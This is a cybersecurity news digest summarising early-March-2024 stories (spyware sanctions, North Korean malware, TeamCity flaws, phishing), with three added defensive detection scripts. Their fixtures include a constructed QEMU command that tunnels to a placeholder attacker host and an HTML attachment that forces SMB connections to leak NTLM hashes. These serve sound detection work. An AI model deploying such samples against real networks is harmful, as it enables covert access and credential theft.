Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 11787

Checks for new stories every ~15 minutes

2024-03-05 18:12:10 bleepingcomputer NATION STATE ACTIVITY U.S. Sanctions Entities Behind Predator Spyware Targeting Americans
The U.S. Department of the Treasury's OFAC has sanctioned individuals and entities linked to the Predator commercial spyware, which has been used to target U.S. government officials, journalists, and policy experts, among others. The designations cover Tal Jonathan Dilian, the Israeli founder of the Intellexa Consortium, and Sara Aleksandra Fayssal Hamou, a Polish corporate off-shoring specialist, as well as companies involved in distributing the Predator technology. Predator's capabilities, including its use of zero-day vulnerabilities, have been documented in reports by Google's Threat Analysis Group and Cisco Talos. Inclusion on OFAC's SDN List freezes any U.S. assets of the designated parties and bars U.S. persons from transacting with them, with severe penalties for non-compliance. The move is intended to counter the misuse of commercial spyware and to deter international partners from dealing with the sanctioned parties. Despite the global scrutiny, Recorded Future reports that Predator's distribution continues to expand to additional countries.
2024-03-05 17:10:45 theregister NATION STATE ACTIVITY U.S. Veteran Charged with Sharing Defense Secrets via Dating App
Retired U.S. Army Lieutenant Colonel David Franklin Slater has been indicted for allegedly disclosing national defense information (NDI) through a dating app. Slater, who held a Top Secret clearance as a civilian Air Force employee, attended briefings on the war in Ukraine and passed on NDI classified up to the "Secret" level, ranging from military targets to Russian military capabilities. His correspondent, a supposed Ukrainian woman whom Slater believed to be genuine, asked for insights into U.S. intelligence assessments and Top Secret meetings. If convicted, Slater faces up to 10 years in prison, three years of supervised release, and a fine of $250,000 on each count. Justice Department officials stressed their commitment to holding accountable anyone who jeopardizes national security by unlawfully disclosing classified information.
2024-03-05 16:49:52 bleepingcomputer CYBERCRIME Hackers Employ QEMU for Covert Network Tunneling in Cyberattack
Cybercriminals abused the open-source QEMU hypervisor to build stealthy network tunnels during an attack on a large company. QEMU's virtual network interface and its socket-type network device were used to establish a covert channel from the victim's system to the attacker's server, which let the attackers bypass firewalls and intrusion detection systems and operate with minimal impact on system performance. The case fits a wider trend of attackers using legitimate tools to stay undetected, something Kaspersky says it sees in roughly 10% of the cases it investigates. Angry IP Scanner and Mimikatz were used alongside QEMU, and the footprint was kept small: the VM was started with only 1 MB of RAM, since the guest needed no operating system, only the network plumbing. To counter such threats, Kaspersky recommends multi-level protection with 24/7 network and endpoint monitoring by SOC experts so early-stage activity can be detected and blocked.
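A detection check for the technique described above, written here as an added example and not taken from the article or from Kaspersky: it inspects process-creation events for a qemu-system binary started with a socket-type netdev (the tunnel endpoint), a guest too small to boot an operating system, or a binary outside the install paths an administrator would use. The events, the install paths and the 64 MB threshold are constructed assumptions for the example; the command line on the first event is modelled on the publicly described pattern rather than copied from real telemetry.

```python
import re
import shlex

# Constructed sample process-creation events (not real telemetry). The first is
# modelled on the described tunnel: a 1 MB guest whose "socket" netdev connects
# out to an attacker host and is bridged to a "user" netdev via a hub.
SAMPLE_EVENTS = [
    {"host": "ws-042", "image": r"C:\Users\Public\qemu\qemu-system-i386.exe",
     "cmdline": "qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off "
                "-netdev socket,id=sock,connect=203.0.113.5:443 "
                "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
                "-netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic"},
    {"host": "dev-07", "image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
     "cmdline": "qemu-system-x86_64.exe -m 4096 -hda win10.qcow2 "
                "-netdev user,id=n0 -device e1000,netdev=n0"},
    {"host": "ws-042", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

QEMU_IMAGE = re.compile(r"qemu-system-[\w-]+(\.exe)?$", re.IGNORECASE)
# Assumption: where an admin-installed QEMU would normally live in this estate.
EXPECTED_DIRS = (r"c:\program files\qemu", "/usr/bin", "/usr/local/bin")
SMALL_GUEST_MB = 64  # assumption: no real guest OS boots in less than this


def mem_mb(value: str) -> float:
    """Parse a QEMU -m size ('1M', '512', '2G') into megabytes (MB is the default unit)."""
    m = re.fullmatch(r"(\d+(?:\.\d+)?)([kKmMgG]?)", value.split(",")[0])
    if not m:
        return float("nan")
    num, unit = float(m.group(1)), m.group(2).lower()
    return num * {"": 1, "k": 1 / 1024, "m": 1, "g": 1024}[unit]


def parse_qemu_args(cmdline: str):
    """Return (guest memory in MB or None, list of -netdev option dicts)."""
    toks = shlex.split(cmdline, posix=False)  # Windows-style: keep backslashes
    mem, netdevs = None, []
    for i, tok in enumerate(toks[:-1]):
        if tok == "-m":
            mem = mem_mb(toks[i + 1])
        elif tok == "-netdev":
            spec = toks[i + 1].split(",")
            opts = {"type": spec[0]}
            for kv in spec[1:]:
                k, _, v = kv.partition("=")
                opts[k] = v
            netdevs.append(opts)
    return mem, netdevs


def analyze(event: dict) -> list[str]:
    """Return human-readable findings for one process-creation event (empty if benign)."""
    image = event["image"].lower()
    if not QEMU_IMAGE.search(image):
        return []
    findings = []
    if not image.startswith(EXPECTED_DIRS):
        findings.append(f"qemu launched from unexpected path {event['image']}")
    mem, netdevs = parse_qemu_args(event["cmdline"])
    if mem is not None and mem < SMALL_GUEST_MB:
        findings.append(f"guest memory {mem:g} MB is too small to run an OS")
    for nd in netdevs:
        if nd["type"] == "socket":
            peer = nd.get("connect") or nd.get("listen") or nd.get("mcast")
            findings.append(f"socket netdev '{nd.get('id')}' carries guest traffic to {peer}")
    types = {nd["type"] for nd in netdevs}
    if {"socket", "user", "hubport"} <= types:
        findings.append("user + socket netdevs joined by hubport: host-network-to-remote tunnel")
    return findings


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for finding in analyze(ev):
            print(f"[{ev['host']}] {finding}")
```

The socket netdev is the strongest signal on its own: a legitimate developer VM almost never needs `-netdev socket,connect=host:port`, whereas the tunnel cannot work without it. The memory and path checks are there to rank alerts, not to gate them.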
2024-03-05 16:23:54 theregister DATA BREACH Social Media Platform Exposes User IP Addresses by Default
Social media platform X now exposes users' IP addresses through its audio and video calling feature, which is enabled by default. Calls are peer-to-peer, so each participant learns the other's IP address, which can be used to approximate their location. An 'Enhanced call privacy' setting masks IP addresses by routing calls through X's infrastructure, but whether calls are encrypted is unclear: the help page for the feature says nothing about encryption of any kind. Users are advised to disable audio and video calling altogether; because the settings menu is hard to navigate, the path is app settings, then Privacy and Safety, then Direct Messages, where audio and video calling can be toggled off. The default-on rollout has drawn criticism because many users will be unaware of the exposure. X was asked to clarify its security measures, including encryption, but replied only with an automated message.
2024-03-05 16:23:54 thehackernews NATION STATE ACTIVITY North Korean Hackers Deploy TODDLERSHARK Malware Via ScreenConnect Flaw
North Korean threat actors have exploited vulnerabilities in ConnectWise ScreenConnect to deploy a new malware known as TODDLERSHARK. The flaws, CVE-2024-1708 and CVE-2024-1709, have been used in a range of attacks, including the delivery of ransomware, cryptocurrency miners, and other malicious payloads. Kroll researchers found similarities between TODDLERSHARK and the earlier BabyShark and ReconShark malware attributed to the Kimsuky espionage group. TODDLERSHARK uses polymorphic code to evade detection and a scheduled task for persistence. Separately, South Korea's National Intelligence Service reported North Korean intrusions at domestic semiconductor firms in December 2023 and February 2024, in which sensitive data was extracted using living-off-the-land techniques rather than deployed malware, underlining the continuing threat from the country.
2024-03-05 15:53:08 bleepingcomputer CYBERCRIME BlackCat Ransomware Announces Shutdown in Alleged Exit Scam
The BlackCat ransomware gang appears to be performing an exit scam, having taken its Tor data leak blog and negotiation servers offline. Its administrators put up a fake FBI seizure notice to suggest law enforcement had intervened; ransomware expert Fabian Wosar noted that the notice was assembled in a makeshift way, which points to it being part of the scam. An affiliate has accused the group of stealing a $22 million ransom that was owed to them. The group, believed to be a rebrand of DarkSide and BlackMatter, had already seen its activity fluctuate under law enforcement pressure, and its operators now claim to be selling the malware source code for $5 million as they wind down. Whether the group resurfaces under a new name is uncertain, given its damaged reputation among potential affiliates.
2024-03-05 15:06:48 bleepingcomputer MISCELLANEOUS Reducing Organizational Costs Through Efficient Password Management
Poor password management costs organizations through lost productivity, help desk load, and security incidents. Employees spend an average of 11 hours per year on password-related issues, which the article puts at $480.26 per employee in lost productivity, and password resets can make up as much as 50% of help desk calls, with corresponding staff and operational costs. Weak or reused passwords add security risk: 86% of data breaches involve stolen credentials, and the average breach now costs $4.45 million. Multi-factor authentication (MFA) and single sign-on (SSO) improve security while cutting help desk volume, and self-service password reset lets users manage their own passwords without a support call. Regular training on password practices and investment in password security software are recommended to prevent both incidents and operational inefficiency.
2024-03-05 14:35:46 bleepingcomputer NATION STATE ACTIVITY North Korean Hackers Deploy New 'ToddlerShark' Malware via ScreenConnect Flaws
The North Korean state-sponsored group Kimsuky is exploiting ScreenConnect vulnerabilities to install the ToddlerShark malware. ToddlerShark is built for long-term espionage: it uses legitimate Microsoft binaries, alters the registry to weaken security settings, persists through scheduled tasks, and continuously collects and exfiltrates data. It is a variant of Kimsuky's BabyShark and ReconShark backdoors, which have previously been used against a range of international targets. Its polymorphic code defeats static and signature-based detection, and its dynamically generated URLs and unique payload hashes make it hard to block by indicator alone. Kroll says a detailed analysis and indicators of compromise (IoCs) will follow in an upcoming blog post.
2024-03-05 13:19:07 theregister CYBERCRIME Rapid7 Criticizes JetBrains for Uncoordinated Vulnerability Disclosure
Rapid7 reported two critical vulnerabilities in JetBrains' TeamCity CI/CD server in mid-February. JetBrains patched them silently, without a public advisory, contrary to infosec community norms; after Rapid7 objected, JetBrains published details of the flaws but did not explain the silent patching. Exploitation began shortly after disclosure, sharpening concerns about the uncoordinated release. CVE-2024-27198 is rated critical and lets an unauthenticated attacker gain administrative control and execute code remotely; CVE-2024-27199 allows information disclosure and limited system modification, including the potential for man-in-the-middle attacks. TeamCity Cloud instances have been patched by JetBrains, but on-premises installations must be updated to 2023.11.4 or have the security patch plugin applied. The security community has criticized JetBrains for not following coordinated vulnerability disclosure practice.
2024-03-05 11:00:57 thehackernews CYBERCRIME Sophisticated DNS Hijacking Scheme Targets Global Investors
A threat actor tracked as Savvy Seahorse is using DNS to run fake investment platforms that defraud victims. The campaign is broad, targeting Russian, Polish, German and other language groups, and lures victims through social media ads and fake ChatGPT and WhatsApp bots that collect personal information for supposedly high-return investments. Technically, the actor uses DNS CNAME records to route traffic for many lookalike domains through infrastructure it controls, which makes the phishing sites easy to rotate and resistant to takedown. Victims enter personal details and deposit funds into fraudulent trading platforms, from which the money is transferred to a Russian bank. The actor selectively excludes traffic from certain countries, including Ukraine and India, for reasons that are unclear. Infoblox, which tracks the actor, says this is the first time it has seen CNAME records used as a traffic distribution system for financial scams, a sign of growing sophistication in how DNS is abused.
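An analysis step that follows from the CNAME technique described above, written here as an added example rather than code from the article or from Infoblox: given passive-DNS-style records, follow each name's CNAME chain to its terminal target and group the registrable domains that land on the same target. Many unrelated lookalike domains converging on one CNAME target is the pattern worth pivoting on, and the target, not the individual lookalikes, is where a takedown or a block has effect. The records, the `tds-hub.example.net` target and the "last two labels" definition of a registrable domain are constructed assumptions for the example; production code should use the Public Suffix List.

```python
from collections import defaultdict

# Constructed passive-DNS-style records (name -> CNAME target). Not real data.
RECORDS = {
    "secure-invest.example-bank.com": "go.tds-hub.example.net",
    "profit-now.example-trade.pl": "go.tds-hub.example.net",
    "kapital.example-fund.de": "enter.tds-hub.example.net",
    "enter.tds-hub.example.net": "go.tds-hub.example.net",   # two-hop chain
    "loop-a.example.org": "loop-b.example.org",               # malformed: CNAME loop
    "loop-b.example.org": "loop-a.example.org",
    "www.example-corp.com": "cdn.example-cdn.net",            # benign, one customer only
}


def registrable(name: str) -> str:
    """Registrable domain of a name.

    Assumption for the example: the last two labels. Real tooling must consult the
    Public Suffix List, otherwise 'foo.co.uk' and 'bar.co.uk' collapse into 'co.uk'.
    """
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def resolve_chain(name: str, records: dict, max_hops: int = 10):
    """Follow CNAMEs from name. Returns (chain, status) with status ok|loop|too-long."""
    chain, seen = [name], {name}
    while chain[-1] in records:
        nxt = records[chain[-1]]
        chain.append(nxt)
        if nxt in seen:
            return chain, "loop"
        if len(chain) > max_hops:
            return chain, "too-long"
        seen.add(nxt)
    return chain, "ok"


def cluster_by_terminal(records: dict, min_domains: int = 3) -> dict:
    """Map each terminal CNAME target to the sorted registrable domains that reach it,
    keeping only targets shared by at least min_domains unrelated domains.

    Names belonging to the target's own registrable domain (the actor's intermediate
    hosts) are not counted as customers of the target.
    """
    groups = defaultdict(set)
    for name in records:
        chain, status = resolve_chain(name, records)
        if status != "ok":
            continue  # loops and over-long chains are reported separately, not clustered
        terminal = chain[-1]
        if registrable(name) != registrable(terminal):
            groups[terminal].add(registrable(name))
    return {t: sorted(d) for t, d in groups.items() if len(d) >= min_domains}


if __name__ == "__main__":
    for target, domains in cluster_by_terminal(RECORDS).items():
        print(f"{target} is the CNAME terminal for {len(domains)} domains: {', '.join(domains)}")
    for n in RECORDS:
        chain, status = resolve_chain(n, RECORDS)
        if status != "ok":
            print(f"{n}: {status} chain {' -> '.join(chain)}")
```

Loops and over-long chains are excluded from clustering rather than silently truncated, because a resolver would fail those names and they cannot be serving victims; they are still worth listing as misconfigured or deliberately obstructive infrastructure.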
2024-03-05 11:00:57 thehackernews MISCELLANEOUS Enhancing Cybersecurity with Effective Exposure Management
Exposure management gives visibility into the whole attack surface and identifies where an organization's infrastructure is exposed. It goes beyond external attack surface management (ASM) by also taking data assets, user identities, and cloud configurations into account, giving a more complete picture of risk. As organizations move to cloud or hybrid environments their attack surface grows and becomes harder to monitor and secure, while the threat landscape keeps shifting, with thousands of new vulnerabilities disclosed regularly, including critical ones exploited by ransomware operators. Traditional security processes are reactive and their data is fragmented across tools, which makes prioritization difficult. Exposure management aims to provide a prioritized, contextual view of likely breach paths so that teams address the most serious risks first; automated vulnerability management tools such as Intruder support this by continuously monitoring for change.
2024-03-05 10:45:08 thehackernews DATA BREACH Over 225K ChatGPT Credentials Sold on Dark Web
More than 225,000 OpenAI ChatGPT login credentials have been offered for sale on dark web markets. The thefts are attributed to the LummaC2, Raccoon, and RedLine infostealer families, and the number of compromised ChatGPT accounts rose 36% between June and October 2023 compared with the first five months of the year. The surge coincides with nation-state interest in using AI and large language models for cyberattacks, and criminals are targeting devices that have access to AI systems, using the stolen data for espionage and further attacks. Abuse of valid accounts has become a primary initial-access method, complicating identity and access management for defenders. IBM X-Force warns that enterprise credentials can be exposed through password reuse, browser credential stores, or enterprise accounts used on personal devices.
2024-03-05 10:29:26 thehackernews CYBERCRIME Sophisticated Phishing Scam Steals Credentials via Email Thread Hijacking
The prolific threat actor TA577 has been observed using ZIP attachments in phishing emails to steal NTLM hashes. Two large campaigns on February 26 and 27, 2024 sent thousands of messages to hundreds of organizations worldwide. The emails hijack existing threads and carry ZIP files containing HTML files that, when opened, make Windows connect to an actor-controlled SMB server. That connection hands the attacker NTLMv2 challenge/response pairs, which can be cracked offline or relayed to other services to move through the network and reach data (they are not NT hashes, so they cannot be used directly in pass-the-hash). TA577, also tracked as Water Curupira, distributes advanced malware and has a history of adopting new techniques quickly; Proofpoint highlights how rapidly the group adapts to evade detection. To reduce exposure, organizations are advised to block outbound SMB connections at the network perimeter.
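A triage check for the attachment technique described above, written here as an added example and not taken from the article or from Proofpoint: it parses an HTML attachment and lists every reference that Windows would fetch over SMB, namely `file://` URLs with a remote host and `\\host\share` UNC paths, in a meta refresh or in any resource-loading attribute. The sample attachment is constructed for the example and modelled on the described behaviour (an immediate redirect to a file:// URL); the hosts are documentation placeholders. Blocking outbound TCP 445 at the perimeter is the mitigation the article recommends; this scanner is for deciding which mails and hosts to act on.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment (not a real sample). A meta refresh to a file:// URL
# on a remote host makes Windows open an SMB session, and with it an NTLM exchange,
# to the attacker's server. The tracking-pixel UNC path shows the second form.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.77/share/invoice.txt">
<title>Invoice</title></head>
<body><p>Loading document...</p>
<img src="\\\\fileserver.example.net\\public\\logo.png" width="1" height="1">
<script src="https://cdn.example.org/app.js"></script>
</body></html>"""

# Attributes whose value the browser (or the Windows shell) will try to load.
URL_ATTRS = {"src", "href", "data", "action", "background", "poster"}
UNC = re.compile(r"^\\\\([^\\/]+)\\")  # \\host\share...


class RefCollector(HTMLParser):
    """Collects (location, reference) pairs for everything the page would fetch."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser already lowercases attribute names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.IGNORECASE)
            if m:
                self.refs.append(("meta-refresh", m.group(1).strip()))
        for k, v in attrs:
            if k in URL_ATTRS and v:
                self.refs.append((f"{tag}[{k}]", v.strip()))


def smb_target(ref: str):
    """Return the remote host if fetching ref would open an SMB session, else None."""
    m = UNC.match(ref)
    if m:
        return m.group(1)
    u = urlparse(ref)
    if u.scheme.lower() == "file" and u.hostname:  # file:///local/path has no host
        return u.hostname
    return None


def scan_html(html: str) -> list[dict]:
    """List every reference in html that would trigger an outbound SMB connection."""
    p = RefCollector()
    p.feed(html)
    return [{"where": w, "ref": r, "host": h} for w, r in p.refs if (h := smb_target(r))]


def hosts_to_block(html: str) -> list[str]:
    """Distinct remote hosts an egress filter should deny for this attachment."""
    return sorted({f["host"] for f in scan_html(html)})


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['where']:14} -> {f['ref']}  (SMB to {f['host']})")
    print("block:", ", ".join(hosts_to_block(SAMPLE_HTML)))
```

Only references with a remote host are reported: `file:///C:/...` points at the local disk and triggers no network authentication, and an `https://` script is a browser fetch, not an SMB session. A hit on an internal file server is still worth reviewing, since the attacker only needs the user to reach one host they control.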
2024-03-05 09:33:17 theregister DATA BREACH Charity Penalized for Sending Unauthorized Solicitation Texts
Penny Appeal, a charity that works in crisis-hit countries, has been ordered by the ICO to stop sending unsolicited texts. The charity sent more than 460,000 marketing texts in ten days without valid consent; the ICO received 354 complaints from recipients, who reported ignored opt-out requests and intrusive messaging. Penny Appeal had ignored earlier warnings, and the ICO's investigation found a flawed database practice: opt-out requests were not logged, and anyone who had interacted with the charity in the previous five years was messaged. The ICO stresses that valid consent is required for marketing communications regardless of an organization's size. This is not the first charity to face ICO action; larger charities have previously been fined. The case underlines that all entities, non-profits included, must comply with direct marketing law.
2024-03-05 03:41:48 thehackernews CYBERCRIME Critical Vulnerabilities in JetBrains TeamCity Lead to Urgent Patch
Newly disclosed vulnerabilities in JetBrains TeamCity could let attackers take over servers. The flaws, CVE-2024-27198 and CVE-2024-27199, an authentication bypass and a path traversal issue discovered and reported by Rapid7, are fixed in the latest TeamCity release. Exploiting them lets an attacker bypass authentication and compromise the server, which as a CI/CD system is a natural staging point for supply chain attacks. TeamCity Cloud instances have already been patched, but on-premises installations need to be updated immediately. Earlier TeamCity vulnerabilities were exploited by North Korean and Russian threat actors, which shows the risk of delayed patching, and JetBrains urges users to update their servers without delay.